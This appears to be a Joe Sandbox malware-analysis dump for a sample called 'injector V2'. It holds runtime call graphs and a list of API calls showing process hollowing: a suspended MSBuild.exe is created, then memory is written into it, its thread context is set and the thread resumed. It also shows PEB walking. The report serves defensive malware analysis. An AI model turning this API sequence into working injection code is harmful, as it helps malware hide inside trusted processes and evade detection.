17009 b4dc4b __freea 14 API calls 17007->17009 17010 b504fc 17008->17010 17009->16984 17011 b4dc4b __freea 14 API calls 17010->17011 17011->16998 17013 b5033b 17012->17013 17014 b50559 17012->17014 17013->16962 17013->16963 17013->16965 17044 b505bb 17014->17044 17017 b503d9 17016->17017 17019 b5057c 17016->17019 17017->16972 17017->16978 17019->17017 17059 b5357b 17019->17059 17021 b50031 17020->17021 17022 b5004c 17020->17022 17021->17022 17023 b5003d 17021->17023 17024 b5005b 17022->17024 17159 b533a8 17022->17159 17025 b4e41c __strnicoll 14 API calls 17023->17025 17166 b533db 17024->17166 17028 b50042 _unexpected 17025->17028 17028->16990 17178 b4f1ca 17029->17178 17034 b536df 17037 b4dc4b __freea 14 API calls 17034->17037 17040 b536eb 17034->17040 17035 b4f1ca 39 API calls 17036 b536bc 17035->17036 17039 b4f262 17 API calls 17036->17039 17037->17040 17038 b504f1 17038->17006 17038->17007 17042 b536c9 17039->17042 17040->17038 17041 b4dc4b __freea 14 API calls 17040->17041 17041->17038 17042->17034 17043 b536d3 SetEnvironmentVariableW 17042->17043 17043->17034 17045 b505ce 17044->17045 17046 b505c9 17044->17046 17047 b4eb3e _unexpected 14 API calls 17045->17047 17046->17013 17056 b505eb 17047->17056 17048 b50659 17050 b4c09e CallUnexpected 39 API calls 17048->17050 17049 b50648 17052 b4dc4b __freea 14 API calls 17049->17052 17051 b5065e 17050->17051 17053 b4b766 __strnicoll 11 API calls 17051->17053 17052->17046 17054 b5066a 17053->17054 17055 b4eb3e _unexpected 14 API calls 17055->17056 17056->17048 17056->17049 17056->17051 17056->17055 17057 b4dc4b __freea 14 API calls 17056->17057 17058 b4c1ec ___std_exception_copy 39 API calls 17056->17058 17057->17056 17058->17056 17060 b5358f 17059->17060 17061 b53589 17059->17061 17077 b535a4 17060->17077 17064 b53dd7 17061->17064 17065 b53e1f 17061->17065 17067 b53ddd 17064->17067 17070 b53dfa 17064->17070 17097 b53e35 17065->17097 17069 b4e41c __strnicoll 14 API calls 17067->17069 17068 b53ded 17068->17019 17071 b53de2 17069->17071 17073 b4e41c __strnicoll 14 API calls 17070->17073 17076 b53e18 17070->17076 17072 b4b739 __strnicoll 39 API calls 17071->17072 17072->17068 17074 b53e09 17073->17074 17075 b4b739 __strnicoll 39 API calls 17074->17075 17075->17068 17076->17019 17078 b4d448 __strnicoll 39 API calls 17077->17078 17079 b535ba 17078->17079 17080 b535d6 17079->17080 17081 b535ed 17079->17081 17093 b5359f 17079->17093 17082 b4e41c __strnicoll 14 API calls 17080->17082 17084 b535f6 17081->17084 17085 b53608 17081->17085 17083 b535db 17082->17083 17088 b4b739 __strnicoll 39 API calls 17083->17088 17089 b4e41c __strnicoll 14 API calls 17084->17089 17086 b53615 17085->17086 17087 b53628 17085->17087 17091 b53e35 __strnicoll 39 API calls 17086->17091 17115 b53f00 17087->17115 17088->17093 17090 b535fb 17089->17090 17094 b4b739 __strnicoll 39 API calls 17090->17094 17091->17093 17093->17019 17094->17093 17096 b4e41c __strnicoll 14 API calls 17096->17093 17098 b53e45 17097->17098 17099 b53e5f 17097->17099 17102 b4e41c __strnicoll 14 API calls 17098->17102 17100 b53e67 17099->17100 17101 b53e7e 17099->17101 17103 b4e41c __strnicoll 14 API calls 17100->17103 17104 b53e8a 17101->17104 17108 b53ea1 17101->17108 17105 b53e4a 17102->17105 17106 b53e6c 17103->17106 17107 b4e41c __strnicoll 14 API calls 17104->17107 17109 b4b739 __strnicoll 39 API calls 17105->17109 17110 b4b739 __strnicoll 39 API calls 17106->17110 17111 b53e8f 17107->17111 17112 b4d448 __strnicoll 39 API calls 17108->17112 17114 b53e55 17108->17114 17109->17114 17110->17114 17113 b4b739 __strnicoll 39 API calls 17111->17113 17112->17114 17113->17114 17114->17068 17116 b4d448 __strnicoll 39 API calls 17115->17116 17117 b53f13 17116->17117 17120 b53f46 17117->17120 17121 b53f7a __strnicoll 17120->17121 17124 b53ffa 17121->17124 17125 b541de 17121->17125 17127 b53fe7 GetCPInfo 17121->17127 17132 b53ffe 17121->17132 17122 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17123 b5363e 17122->17123 17123->17093 17123->17096 17126 b4ed44 __strnicoll MultiByteToWideChar 17124->17126 17124->17132 17129 b54080 17126->17129 17127->17124 17127->17132 17128 b541d2 17130 b4ec23 __freea 14 API calls 17128->17130 17129->17128 17131 b4eb9b __strnicoll 15 API calls 17129->17131 17129->17132 17133 b540a7 __alloca_probe_16 17129->17133 17130->17132 17131->17133 17132->17122 17132->17125 17133->17128 17134 b4ed44 __strnicoll MultiByteToWideChar 17133->17134 17135 b540f3 17134->17135 17135->17128 17136 b4ed44 __strnicoll MultiByteToWideChar 17135->17136 17137 b5410f 17136->17137 17137->17128 17138 b5411d 17137->17138 17139 b54180 17138->17139 17141 b4eb9b __strnicoll 15 API calls 17138->17141 17144 b54136 __alloca_probe_16 17138->17144 17140 b4ec23 __freea 14 API calls 17139->17140 17142 b54186 17140->17142 17141->17144 17143 b4ec23 __freea 14 API calls 17142->17143 17143->17132 17144->17139 17145 b4ed44 __strnicoll MultiByteToWideChar 17144->17145 17146 b54179 17145->17146 17146->17139 17147 b541a2 17146->17147 17153 b4c625 17147->17153 17150 b4ec23 __freea 14 API calls 17151 b541c2 17150->17151 17152 b4ec23 __freea 14 API calls 17151->17152 17152->17132 17154 b4ca04 __strnicoll 5 API calls 17153->17154 17155 b4c630 17154->17155 17156 b4c829 __strnicoll 5 API calls 17155->17156 17158 b4c636 17155->17158 17157 b4c676 CompareStringW 17156->17157 17157->17158 17158->17150 17160 b533b3 17159->17160 17161 b533c8 HeapSize 17159->17161 17162 b4e41c __strnicoll 14 API calls 17160->17162 17161->17024 17163 b533b8 17162->17163 17164 b4b739 __strnicoll 39 API calls 17163->17164 17165 b533c3 17164->17165 17165->17024 17167 b533f3 17166->17167 17168 b533e8 17166->17168 17170 b533fb 17167->17170 17176 b53404 _unexpected 17167->17176 17169 b4eb9b __strnicoll 15 API calls 17168->17169 17174 b533f0 17169->17174 17171 b4dc4b __freea 14 API calls 17170->17171 17171->17174 17172 b5342e HeapReAlloc 17172->17174 17172->17176 17173 b53409 17175 b4e41c __strnicoll 14 API calls 17173->17175 17174->17028 17175->17174 17176->17172 17176->17173 17177 b4abd8 _unexpected 2 API calls 17176->17177 17177->17176 17179 b4d448 __strnicoll 39 API calls 17178->17179 17180 b4f1dc 17179->17180 17181 b4f1ee 17180->17181 17186 b4c606 17180->17186 17183 b4f262 17181->17183 17192 b4f438 17183->17192 17189 b4c9ea 17186->17189 17190 b4c965 _unexpected 5 API calls 17189->17190 17191 b4c60e 17190->17191 17191->17181 17193 b4f446 17192->17193 17194 b4f460 17192->17194 17210 b4f248 17193->17210 17196 b4f486 17194->17196 17197 b4f467 17194->17197 17198 b4ed44 __strnicoll MultiByteToWideChar 17196->17198 17199 b4f27a 17197->17199 17214 b4f209 17197->17214 17204 b4f495 17198->17204 17199->17034 17199->17035 17201 b4f49c GetLastError 17219 b4e442 17201->17219 17203 b4f4c2 17203->17199 17207 b4ed44 __strnicoll MultiByteToWideChar 17203->17207 17204->17201 17204->17203 17206 b4f209 15 API calls 17204->17206 17206->17203 17209 b4f4d9 17207->17209 17208 b4e41c __strnicoll 14 API calls 17208->17199 17209->17199 17209->17201 17211 b4f253 17210->17211 17213 b4f25b 17210->17213 17212 b4dc4b __freea 14 API calls 17211->17212 17212->17213 17213->17199 17215 b4f248 14 API calls 17214->17215 17216 b4f217 17215->17216 17224 b4f1ab 17216->17224 17227 b4e42f 17219->17227 17221 b4e44d __dosmaperr 17222 b4e41c __strnicoll 14 API calls 17221->17222 17223 b4e460 17222->17223 17223->17208 17225 b4eb9b __strnicoll 15 API calls 17224->17225 17226 b4f1b8 17225->17226 17226->17199 17228 b4ccdb __dosmaperr 14 API calls 17227->17228 17229 b4e434 17228->17229 17229->17221 17231 b4aa1e 17230->17231 17240 b4aa2f 17230->17240 17232 b4965c _unexpected GetModuleHandleW 17231->17232 17234 b4aa23 17232->17234 17234->17240 17241 b4a925 GetModuleHandleExW 17234->17241 17236 b4a8dd 17236->16363 17246 b4ab8b 17240->17246 17242 b4a964 GetProcAddress 17241->17242 17245 b4a978 17241->17245 17242->17245 17243 b4a994 17243->17240 17244 b4a98b FreeLibrary 17244->17243 17245->17243 17245->17244 17247 b4ab97 ___scrt_is_nonwritable_in_current_image 17246->17247 17261 b4cae1 EnterCriticalSection 17247->17261 17249 b4aba1 17262 b4aa88 17249->17262 17251 b4abae 17266 b4abcc 17251->17266 17254 b4a9c0 17291 b4a9a7 17254->17291 17256 b4a9ca 17257 b4a9de 17256->17257 17258 b4a9ce GetCurrentProcess TerminateProcess 17256->17258 17259 b4a925 _unexpected 3 API calls 17257->17259 17258->17257 17260 b4a9e6 ExitProcess 17259->17260 17261->17249 17264 b4aa94 ___scrt_is_nonwritable_in_current_image _unexpected 17262->17264 17263 b4aaf8 _unexpected 17263->17251 17264->17263 17269 b4b13b 17264->17269 17290 b4caf8 LeaveCriticalSection 17266->17290 17268 b4aa67 17268->17236 17268->17254 17270 b4b147 __EH_prolog3 17269->17270 17273 b4b3c6 17270->17273 17272 b4b16e _unexpected 17272->17263 17274 b4b3d2 ___scrt_is_nonwritable_in_current_image 17273->17274 17281 b4cae1 EnterCriticalSection 17274->17281 17276 b4b3e0 17282 b4b291 17276->17282 17281->17276 17283 b4b2a8 17282->17283 17284 b4b2b0 17282->17284 17286 b4b415 17283->17286 17284->17283 17285 b4dc4b __freea 14 API calls 17284->17285 17285->17283 17289 b4caf8 LeaveCriticalSection 17286->17289 17288 b4b3fe 17288->17272 17289->17288 17290->17268 17294 b4e4f1 17291->17294 17293 b4a9ac _unexpected 17293->17256 17295 b4e500 _unexpected 17294->17295 17296 b4e50d 17295->17296 17298 b4c85a 17295->17298 17296->17293 17299 b4c965 _unexpected 5 API calls 17298->17299 17300 b4c876 17299->17300 17300->17296 17302 b4a78d 17301->17302 17303 b4a79f ___scrt_uninitialize_crt 17301->17303 17304 b4a79b 17302->17304 17306 b4e027 17302->17306 17303->16401 17304->16401 17309 b4e152 17306->17309 17312 b4e22b 17309->17312 17313 b4e237 ___scrt_is_nonwritable_in_current_image 17312->17313 17320 b4cae1 EnterCriticalSection 17313->17320 17315 b4e2ad 17329 b4e2cb 17315->17329 17316 b4e241 ___scrt_uninitialize_crt 17316->17315 17321 b4e19f 17316->17321 17320->17316 17322 b4e1ab ___scrt_is_nonwritable_in_current_image 17321->17322 17332 b4e2d7 EnterCriticalSection 17322->17332 17324 b4e1ee 17346 b4e21f 17324->17346 17325 b4e1b5 ___scrt_uninitialize_crt 17325->17324 17333 b4e030 17325->17333 17445 b4caf8 LeaveCriticalSection 17329->17445 17331 b4e02e 17331->17304 17332->17325 17334 b4e045 __strnicoll 17333->17334 17335 b4e057 17334->17335 17336 b4e04c 17334->17336 17349 b4e095 17335->17349 17338 b4e152 ___scrt_uninitialize_crt 68 API calls 17336->17338 17340 b4e052 17338->17340 17341 b4b9a7 __strnicoll 39 API calls 17340->17341 17343 b4e08f 17341->17343 17343->17324 17344 b4e078 17362 b5108f 17344->17362 17444 b4e2eb LeaveCriticalSection 17346->17444 17348 b4e20d 17348->17316 17350 b4e061 17349->17350 17351 b4e0ae 17349->17351 17350->17340 17355 b511ae 17350->17355 17351->17350 17352 b511ae ___scrt_uninitialize_crt 39 API calls 17351->17352 17353 b4e0ca 17352->17353 17373 b513f1 17353->17373 17356 b511cf 17355->17356 17357 b511ba 17355->17357 17356->17344 17358 b4e41c __strnicoll 14 API calls 17357->17358 17359 b511bf 17358->17359 17360 b4b739 __strnicoll 39 API calls 17359->17360 17361 b511ca 17360->17361 17361->17344 17363 b510a0 17362->17363 17364 b510ad 17362->17364 17365 b4e41c __strnicoll 14 API calls 17363->17365 17366 b510f6 17364->17366 17369 b510d4 17364->17369 17371 b510a5 17365->17371 17367 b4e41c __strnicoll 14 API calls 17366->17367 17368 b510fb 17367->17368 17370 b4b739 __strnicoll 39 API calls 17368->17370 17414 b5110c 17369->17414 17370->17371 17371->17340 17375 b513fd ___scrt_is_nonwritable_in_current_image 17373->17375 17374 b51405 17374->17350 17375->17374 17376 b5143e 17375->17376 17378 b51484 17375->17378 17377 b4b8e2 __strnicoll 29 API calls 17376->17377 17377->17374 17384 b508b4 EnterCriticalSection 17378->17384 17380 b5148a 17381 b514a8 17380->17381 17385 b511d5 17380->17385 17411 b514fa 17381->17411 17384->17380 17386 b511fd 17385->17386 17410 b51220 ___scrt_uninitialize_crt 17385->17410 17387 b51201 17386->17387 17389 b5125c 17386->17389 17388 b4b8e2 __strnicoll 29 API calls 17387->17388 17388->17410 17390 b5127a 17389->17390 17391 b539ac ___scrt_uninitialize_crt 41 API calls 17389->17391 17392 b51502 ___scrt_uninitialize_crt 40 API calls 17390->17392 17391->17390 17393 b5128c 17392->17393 17394 b51292 17393->17394 17395 b512d9 17393->17395 17398 b512c1 17394->17398 17399 b5129a 17394->17399 17396 b51342 WriteFile 17395->17396 17397 b512ed 17395->17397 17400 b51364 GetLastError 17396->17400 17396->17410 17402 b512f5 17397->17402 17403 b5132e 17397->17403 17401 b5157f ___scrt_uninitialize_crt 45 API calls 17398->17401 17406 b51946 ___scrt_uninitialize_crt 6 API calls 17399->17406 17399->17410 17400->17410 17401->17410 17404 b5131a 17402->17404 17405 b512fa 17402->17405 17407 b519ae ___scrt_uninitialize_crt 7 API calls 17403->17407 17408 b51b72 ___scrt_uninitialize_crt 8 API calls 17404->17408 17409 b51a89 ___scrt_uninitialize_crt 7 API calls 17405->17409 17405->17410 17406->17410 17407->17410 17408->17410 17409->17410 17410->17381 17412 b508d7 ___scrt_uninitialize_crt LeaveCriticalSection 17411->17412 17413 b51500 17412->17413 17413->17374 17415 b51118 ___scrt_is_nonwritable_in_current_image 17414->17415 17427 b508b4 EnterCriticalSection 17415->17427 17417 b51127 17425 b5116c 17417->17425 17428 b5066b 17417->17428 17419 b4e41c __strnicoll 14 API calls 17421 b51173 17419->17421 17420 b51153 FlushFileBuffers 17420->17421 17422 b5115f GetLastError 17420->17422 17441 b511a2 17421->17441 17423 b4e42f __dosmaperr 14 API calls 17422->17423 17423->17425 17425->17419 17427->17417 17429 b5068d 17428->17429 17430 b50678 17428->17430 17433 b4e42f __dosmaperr 14 API calls 17429->17433 17435 b506b2 17429->17435 17431 b4e42f __dosmaperr 14 API calls 17430->17431 17432 b5067d 17431->17432 17434 b4e41c __strnicoll 14 API calls 17432->17434 17436 b506bd 17433->17436 17437 b50685 17434->17437 17435->17420 17438 b4e41c __strnicoll 14 API calls 17436->17438 17437->17420 17439 b506c5 17438->17439 17440 b4b739 __strnicoll 39 API calls 17439->17440 17440->17437 17442 b508d7 ___scrt_uninitialize_crt LeaveCriticalSection 17441->17442 17443 b5118b 17442->17443 17443->17371 17444->17348 17445->17331 16105 b4bc74 16108 b4dc4b 16105->16108 16109 b4dc56 RtlFreeHeap 16108->16109 16110 b4bc8c 16108->16110 16109->16110 16111 b4dc6b GetLastError 16109->16111 16112 b4dc78 __dosmaperr 16111->16112 16114 b4e41c 16112->16114 16117 b4ccdb GetLastError 16114->16117 16116 b4e421 16116->16110 16118 b4ccf1 16117->16118 16122 b4ccf7 16117->16122 16140 b4c700 16118->16140 16138 b4ccfb SetLastError 16122->16138 16145 b4c73f 16122->16145 16126 b4cd30 16128 b4c73f _unexpected 6 API calls 16126->16128 16127 b4cd41 16129 b4c73f _unexpected 6 API calls 16127->16129 16130 b4cd3e 16128->16130 16131 b4cd4d 16129->16131 16135 b4dc4b __freea 12 API calls 16130->16135 16132 b4cd51 16131->16132 16133 b4cd68 16131->16133 16134 b4c73f _unexpected 6 API calls 16132->16134 16157 b4ce9c 16133->16157 16134->16130 16135->16138 16138->16116 16139 b4dc4b __freea 12 API calls 16139->16138 16162 b4c965 16140->16162 16143 b4c725 16143->16122 16144 b4c737 TlsGetValue 16146 b4c965 _unexpected 5 API calls 16145->16146 16147 b4c75b 16146->16147 16148 b4c764 16147->16148 16149 b4c779 TlsSetValue 16147->16149 16148->16138 16150 b4eb3e 16148->16150 16151 b4eb4b _unexpected 16150->16151 16152 b4eb8b 16151->16152 16153 b4eb76 HeapAlloc 16151->16153 16177 b4abd8 16151->16177 16154 b4e41c __strnicoll 13 API calls 16152->16154 16153->16151 16155 b4cd28 16153->16155 16154->16155 16155->16126 16155->16127 16191 b4d002 16157->16191 16163 b4c995 16162->16163 16167 b4c71c 16162->16167 16163->16167 16169 b4c89a 16163->16169 16166 b4c9af GetProcAddress 16166->16167 16168 b4c9bf _unexpected 16166->16168 16167->16143 16167->16144 16168->16167 16174 b4c8ab ___vcrt_FlsGetValue 16169->16174 16170 b4c941 16170->16166 16170->16167 16171 b4c8c9 LoadLibraryExW 16172 b4c8e4 GetLastError 16171->16172 16173 b4c948 16171->16173 16172->16174 16173->16170 16175 b4c95a FreeLibrary 16173->16175 16174->16170 16174->16171 16176 b4c917 LoadLibraryExW 16174->16176 16175->16170 16176->16173 16176->16174 16180 b4ac13 16177->16180 16181 b4ac1f ___scrt_is_nonwritable_in_current_image 16180->16181 16186 b4cae1 EnterCriticalSection 16181->16186 16183 b4ac2a _unexpected 16187 b4ac61 16183->16187 16186->16183 16190 b4caf8 LeaveCriticalSection 16187->16190 16189 b4abe3 16189->16151 16190->16189 16192 b4d00e ___scrt_is_nonwritable_in_current_image 16191->16192 16205 b4cae1 EnterCriticalSection 16192->16205 16194 b4d018 16206 b4d048 16194->16206 16197 b4d054 16198 b4d060 ___scrt_is_nonwritable_in_current_image 16197->16198 16210 b4cae1 EnterCriticalSection 16198->16210 16200 b4d06a 16211 b4ce51 16200->16211 16202 b4d082 16215 b4d0a2 16202->16215 16205->16194 16209 b4caf8 LeaveCriticalSection 16206->16209 16208 b4cf0a 16208->16197 16209->16208 16210->16200 16212 b4ce87 _unexpected 16211->16212 16213 b4ce60 _unexpected 16211->16213 16212->16202 16213->16212 16218 b4ef04 16213->16218 16332 b4caf8 LeaveCriticalSection 16215->16332 16217 b4cd73 16217->16139 16219 b4ef84 16218->16219 16226 b4ef1a 16218->16226 16221 b4dc4b __freea 14 API calls 16219->16221 16245 b4efd2 16219->16245 16222 b4efa6 16221->16222 16224 b4dc4b __freea 14 API calls 16222->16224 16223 b4ef4d 16225 b4ef6f 16223->16225 16231 b4dc4b __freea 14 API calls 16223->16231 16227 b4efb9 16224->16227 16228 b4dc4b __freea 14 API calls 16225->16228 16226->16219 16226->16223 16229 b4dc4b __freea 14 API calls 16226->16229 16230 b4dc4b __freea 14 API calls 16227->16230 16232 b4ef79 16228->16232 16234 b4ef42 16229->16234 16238 b4efc7 16230->16238 16239 b4ef64 16231->16239 16240 b4dc4b __freea 14 API calls 16232->16240 16233 b4f040 16241 b4dc4b __freea 14 API calls 16233->16241 16246 b4e8ce 16234->16246 16235 b4efe0 16235->16233 16237 b4dc4b 14 API calls __freea 16235->16237 16237->16235 16242 b4dc4b __freea 14 API calls 16238->16242 16274 b4e9cc 16239->16274 16240->16219 16244 b4f046 16241->16244 16242->16245 16244->16212 16286 b4f09e 16245->16286 16247 b4e8df 16246->16247 16248 b4e9c8 16246->16248 16249 b4e8f0 16247->16249 16251 b4dc4b __freea 14 API calls 16247->16251 16248->16223 16250 b4e902 16249->16250 16252 b4dc4b __freea 14 API calls 16249->16252 16253 b4e914 16250->16253 16254 b4dc4b __freea 14 API calls 16250->16254 16251->16249 16252->16250 16255 b4e926 16253->16255 16256 b4dc4b __freea 14 API calls 16253->16256 16254->16253 16257 b4e938 16255->16257 16259 b4dc4b __freea 14 API calls 16255->16259 16256->16255 16258 b4e94a 16257->16258 16260 b4dc4b __freea 14 API calls 16257->16260 16261 b4e95c 16258->16261 16262 b4dc4b __freea 14 API calls 16258->16262 16259->16257 16260->16258 16263 b4e96e 16261->16263 16264 b4dc4b __freea 14 API calls 16261->16264 16262->16261 16265 b4e980 16263->16265 16267 b4dc4b __freea 14 API calls 16263->16267 16264->16263 16266 b4e992 16265->16266 16268 b4dc4b __freea 14 API calls 16265->16268 16269 b4e9a4 16266->16269 16270 b4dc4b __freea 14 API calls 16266->16270 16267->16265 16268->16266 16271 b4e9b6 16269->16271 16272 b4dc4b __freea 14 API calls 16269->16272 16270->16269 16271->16248 16273 b4dc4b __freea 14 API calls 16271->16273 16272->16271 16273->16248 16275 b4ea31 16274->16275 16276 b4e9d9 16274->16276 16275->16225 16277 b4e9e9 16276->16277 16278 b4dc4b __freea 14 API calls 16276->16278 16279 b4e9fb 16277->16279 16280 b4dc4b __freea 14 API calls 16277->16280 16278->16277 16281 b4ea0d 16279->16281 16283 b4dc4b __freea 14 API calls 16279->16283 16280->16279 16282 b4ea1f 16281->16282 16284 b4dc4b __freea 14 API calls 16281->16284 16282->16275 16285 b4dc4b __freea 14 API calls 16282->16285 16283->16281 16284->16282 16285->16275 16287 b4f0ca 16286->16287 16288 b4f0ab 16286->16288 16287->16235 16288->16287 16292 b4ea35 16288->16292 16291 b4dc4b __freea 14 API calls 16291->16287 16293 b4eb13 16292->16293 16294 b4ea46 16292->16294 16293->16291 16328 b4eb19 16294->16328 16297 b4eb19 _unexpected 14 API calls 16298 b4ea59 16297->16298 16299 b4eb19 _unexpected 14 API calls 16298->16299 16300 b4ea64 16299->16300 16301 b4eb19 _unexpected 14 API calls 16300->16301 16302 b4ea6f 16301->16302 16303 b4eb19 _unexpected 14 API calls 16302->16303 16304 b4ea7d 16303->16304 16305 b4dc4b __freea 14 API calls 16304->16305 16306 b4ea88 16305->16306 16307 b4dc4b __freea 14 API calls 16306->16307 16308 b4ea93 16307->16308 16309 b4dc4b __freea 14 API calls 16308->16309 16310 b4ea9e 16309->16310 16311 b4eb19 _unexpected 14 API calls 16310->16311 16312 b4eaac 16311->16312 16313 b4eb19 _unexpected 14 API calls 16312->16313 16314 b4eaba 16313->16314 16315 b4eb19 _unexpected 14 API calls 16314->16315 16316 b4eacb 16315->16316 16317 b4eb19 _unexpected 14 API calls 16316->16317 16318 b4ead9 16317->16318 16319 b4eb19 _unexpected 14 API calls 16318->16319 16320 b4eae7 16319->16320 16321 b4dc4b __freea 14 API calls 16320->16321 16322 b4eaf2 16321->16322 16323 b4dc4b __freea 14 API calls 16322->16323 16324 b4eafd 16323->16324 16325 b4dc4b __freea 14 API calls 16324->16325 16326 b4eb08 16325->16326 16327 b4dc4b __freea 14 API calls 16326->16327 16327->16293 16329 b4eb2b 16328->16329 16330 b4ea4e 16329->16330 16331 b4dc4b __freea 14 API calls 16329->16331 16330->16297 16331->16329 16332->16217 17446 b2d475 17447 b2dec8 17446->17447 17451 b2cd50 17446->17451 17448 b3017a 17447->17448 17447->17451 17449 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17448->17449 17450 b30184 17449->17450 17452 b2ce30 GetPEB 17451->17452 17454 b29210 17451->17454 17452->17451 17455 b29660 17454->17455 17456 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17455->17456 17457 b2a0a0 17456->17457 17457->17451 18547 b2da6c 18549 b2cd50 18547->18549 18548 b2ce30 GetPEB 18548->18549 18549->18548 18550 b29210 5 API calls 18549->18550 18550->18549

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00B5D0FF,00B5D0EF), ref: 00B5D323
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00B5D336
                                                                                    • Wow64GetThreadContext.KERNEL32(000000F8,00000000), ref: 00B5D354
                                                                                    • ReadProcessMemory.KERNELBASE(00000104,?,00B5D143,00000004,00000000), ref: 00B5D378
                                                                                    • VirtualAllocEx.KERNELBASE(00000104,?,?,00003000,00000040), ref: 00B5D3A3
                                                                                    • TerminateProcess.KERNELBASE(00000104,00000000), ref: 00B5D3C2
                                                                                    • WriteProcessMemory.KERNELBASE(00000104,00000000,?,?,00000000,?), ref: 00B5D3FB
                                                                                    • WriteProcessMemory.KERNELBASE(00000104,00400000,?,?,00000000,?,00000028), ref: 00B5D446
                                                                                    • WriteProcessMemory.KERNELBASE(00000104,?,?,00000004,00000000), ref: 00B5D484
                                                                                    • Wow64SetThreadContext.KERNEL32(000000F8,00A40000), ref: 00B5D4C0
                                                                                    • ResumeThread.KERNELBASE(000000F8), ref: 00B5D4CF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                    • API String ID: 2440066154-3857624555
                                                                                    • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                    • Instruction ID: e150c4a12f20bb977068c66e3957c89d6fc74e7534b9f4564b61261a02f19c73
                                                                                    • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                    • Instruction Fuzzy Hash: AFB1F67660064AAFDB60CF68CC80BDA73A5FF88714F158564EA08AB341D770FA55CB94

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 271 b2d475-b2d47b 272 b2d481-b2d487 271->272 273 b2dec8-b2dece 271->273 276 b2e776-b2e77c 272->276 277 b2d48d-b2d493 272->277 274 b2ded4-b2deda 273->274 275 b3017a-b3018d call b48dd1 273->275 278 b2dee0-b2dee6 274->278 279 b2fc0e-b2fc53 274->279 281 b2e782-b2e788 276->281 282 b2f77e-b2f79a 276->282 283 b2f1a7-b2ffa7 277->283 284 b2d499-b2d49f 277->284 285 b2cd50-b2cd56 278->285 287 b2deec-b2df1a 278->287 293 b2cd58-b2cdb2 279->293 297 b2fc59 279->297 281->285 289 b2e78e-b2e7bc 281->289 282->279 283->293 294 b2ffad 283->294 284->285 286 b2d4a5-b2d4b0 284->286 285->293 296 b2cdd0-b2ce2a 285->296 292 b2d4b6 286->292 286->293 295 b2fe99-b2feb0 287->295 289->295 292->296 293->285 314 b2cdb4-b2cdbf 293->314 294->296 295->293 298 b2feb6 295->298 296->285 313 b2ce30-b2cec2 GetPEB call b23e60 call b25f10 * 2 call b29210 296->313 297->296 298->296 313->293 325 b2cec8 313->325 314->293 316 b2cdc1-b2cdcb 314->316 316->296 325->296
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: XvIL
                                                                                    • API String ID: 0-558896452
                                                                                    • Opcode ID: 77572fdbc8eccc2ef541cafc59767fa55151aa90f9e5607e640e1bb7846b38a9
                                                                                    • Instruction ID: ff3b19026de63191eaf8984a4d6bfdfe40020b1f7e5154132f911ad774da07ff
                                                                                    • Opcode Fuzzy Hash: 77572fdbc8eccc2ef541cafc59767fa55151aa90f9e5607e640e1bb7846b38a9
                                                                                    • Instruction Fuzzy Hash: DB61CB363112218B9E2C9A28B8E563C7BD1DF58361B3542FEF41F57AF4CA25AC4187C2

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
